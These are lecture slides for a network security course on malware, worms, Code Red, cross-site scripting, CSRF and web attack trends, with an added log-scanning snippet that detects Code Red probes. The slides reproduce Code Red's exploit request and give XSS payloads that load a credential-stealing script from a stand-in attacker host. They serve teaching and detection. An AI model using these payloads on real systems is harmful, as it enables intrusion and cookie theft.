Malware, Worms, and Web Issues
IT443 – Network Security Administration
Instructor: Bo Sheng
Malware
• Computer systems still have many vulnerabilities
  • When exposed to the Internet, this leads to exploitation
• Major issue as computer systems become more ubiquitous
• Malware is a generic term that refers to malicious software
• Terminology
  • Virus: computer program designed to spread (requires human intervention)
  • Worm: does not require human intervention
  • Trojan horse: allows remote access to unauthorized users
  • Adware: shows ads when the application is running
  • Spyware: monitors & collects information to be transmitted to a third party without the user's knowledge/consent
Threats to Networks
• Motivation evolved from pursuit of fame to financial and political gain
• Examples
  • BGP hijacking (e.g., the 2008 YouTube hijacking)
  • Viruses, worms and bots are more stealthy today
    • 2008-2009: Conficker infected 2-15 million Windows servers
  • Malware is more prevalent than ever, leading to an underground economy (XSS attacks)
    • "MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits."
Some Interesting Numbers
• From
  • "The Business of Rogueware", PandaLabs, 2010
  • "The Business of Cybercrime", PandaLabs, 2008
  • "Web Based Attacks", Symantec, 2009
• Adware industry is worth 2 billion dollars per year
• Malware industry is worth 105 billion dollars per year
• > 80% of e-mail traffic is spam
• 50%-80% of computers connected to the Internet are infected with spyware
• Some people make 20 thousand dollars (!) per month using botnets (i.e., compromised computers)
• A 26-year-old made 20 million dollars with spam before being caught
• 2 billion dollars was lost to phishers four years ago
Online Crime is a Business Now
• Klikparty, 2007
Web Attacks – Trends [Symantec White Paper 08-2/09]
• Drive-by downloads from mainstream websites
• Dynamic and highly obfuscated malware
• Browser plugins
• Misleading applications
• SQL injection on mainstream websites
• Malvertisements: users redirected to malicious websites
• Exponential increase in unique and targeted malware samples
Web Attacks – Sequence of Events
• Breaking into legitimate websites to post malware
• Attacking end-user machines
• Leveraging end-user machines for malicious activities
Attacking Users' Machines
• Drive-by download sequence of events
  • Compromise a legitimate website
  • User visits; if a multimedia plugin is out of date => the machine can be compromised
  • Redirect to a malicious website, which obtains information such as web browser, OS, plugins
  • Serve malicious multimedia data to compromise the machine
  • Steal personal information
• Software vulnerabilities [report indicates 600M browsers insecure]
• Web attack toolkits (off the shelf)
  • Neosploit, MPack, IcePack, El Fiesta, Adpack
  • Efficient: profiling the victim, timing (below the radar), geographic variances, old to new exploits, brute force, playing the odds, obfuscation, polymorphic malware/URLs
  • Obfuscation using encryption is difficult to detect
History of Worms
• Worms self-replicate by exploiting vulnerabilities in remote machines
  • Apps running on some port
  • Vulnerabilities are purchased for malicious and legitimate use
• Worms carry a payload to take actions
• One of the first worms to spread extensively: Robert Morris, 1988
  • Used fingerd and sendmail buffer overflows, rsh, weak passwords
  • Around 10% of Internet hosts infected
  • Convicted: 3 years of probation, 400 hours of community service work
• Many worms since then, with a peak during the 2000-2004 period
• Today worms are more stealthy
Code Red
• "How to Own the Internet in Your Spare Time", S. Staniford, V. Paxson, N. Weaver, USENIX Security 2002.
• Date: July 13th, 2001 / July 19th, 2001
• Exploit
  • Microsoft IIS web servers using the .ida vulnerability [published June 18, 2001]
• Payload
  • Website defacement
  • DDoS a list of web sites including www.whitehouse.gov
• Spreading
  • 99 threads: each generates random IP addresses and infects
  • 100th thread: defaces website
Code Red CRv1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
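The CRv1 request above is a usable detection signature on the web server side. The following is an added example, not part of the lecture: it parses constructed Common Log Format lines and flags requests matching the worm's shape (the `/default.ida?` handler, a long run of `N` padding, then `%uXXXX` words); the 64-`N` threshold and the sample records are assumptions.

```javascript
// Added example (not from the lecture): flag Code Red-style probes in
// constructed web server access-log lines. The worm's request hits
// /default.ida with a long run of 'N' padding followed by %u-encoded
// bytes, so the request line itself is a usable detection signature.

// Constructed sample records in Common Log Format (not real traffic).
const SAMPLE_LOG = [
  '10.0.0.5 - - [19/Jul/2001:10:01:02 -0400] "GET /index.html HTTP/1.0" 200 1024',
  '10.0.0.9 - - [19/Jul/2001:10:01:07 -0400] "GET /default.ida?' + 'N'.repeat(224) +
    '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 0',
  '10.0.0.7 - - [19/Jul/2001:10:02:11 -0400] "GET /default.ida?q=help HTTP/1.0" 404 0',
  '10.0.0.3 - - [19/Jul/2001:10:03:30 -0400] "POST /login HTTP/1.1" 302 0',
];

// Pull the request out of a CLF record; null if the line does not parse.
function parseRequest(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)"/.exec(line);
  return m ? { ip: m[1], ts: m[2], method: m[3], path: m[4] } : null;
}

// Signature: the .ida handler, a run of at least 64 'N' padding bytes
// (the worm sent 224; 64 is an assumed threshold), then at least one
// %uXXXX Unicode-encoded word.
const CODE_RED_RE = /\/default\.ida\?N{64,}(%u[0-9a-f]{4})+/i;

function isCodeRedProbe(path) {
  return CODE_RED_RE.test(path);
}

// Scan log lines; return one record per suspicious request.
function findCodeRedProbes(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseRequest(line);
    if (req && isCodeRedProbe(req.path)) {
      hits.push({ ip: req.ip, ts: req.ts, method: req.method });
    }
  }
  return hits;
}

console.log(findCodeRedProbes(SAMPLE_LOG)); // one hit, from 10.0.0.9
```

A benign `/default.ida?q=help` request is not flagged, which is the point of keying on the padding and the `%u` encoding rather than on the handler name alone.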
Cross-site Scripting (XSS)
• Vulnerability commonly found in web applications
• Attackers inject malicious code (e.g. JavaScript programs) into the victim's web browser
  • steal the victim's credentials, such as cookies
  • bypass the access control policies
Cross-site Scripting (XSS)
• Bob has a legitimate web site, and Alice is a registered user
• Bob's web site allows queries like http://bobssite.org?q=search_term
• The attacker finds the XSS vulnerability: http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script>
• Non-persistent
  • The attacker emails Alice a link: http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"
• Persistent
  • The attacker posts a comment: I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">
Cross-Site Request Forgery
• The victim user logs into the trusted site using his username and password, and thus creates a new session.
• The trusted site stores the session identifier for the session in a cookie in the victim user's web browser.
• The victim user visits a malicious site.
• The malicious site's web page sends a request to the trusted site from the victim user's browser.
• The web browser automatically attaches the session cookie to the malicious request because it is targeted at the trusted site.
• The trusted site processes the malicious request forged by the attacker's web site.
Legitimate Websites
• Shift from pornographic/pirateware websites to legitimate websites
  • Why? More users, less suspicion
  • In 2008, Symantec observed Web attacks from 808,000 unique domains, many of which are mainstream websites
  • Complex websites with content from many sources (ads), dynamically generated, running on user machines, requiring plugins
• How?
  • SQL injection (inject malicious HTML code into the backend database and serve it to users). Trojan.Asprox automates the process: 1) search the web for vulnerable websites, 2) inject an invisible iframe pointing to malicious pages
  • Malicious advertisements: hard to validate given the amount of ads; hard to detect, as malicious ads appear with low frequency; usually the ad is OK but redirects to a malicious website
  • Search engine redirection, attacks on the backend of virtual hosting, vulnerabilities in web server or forum server, cross-site scripting attacks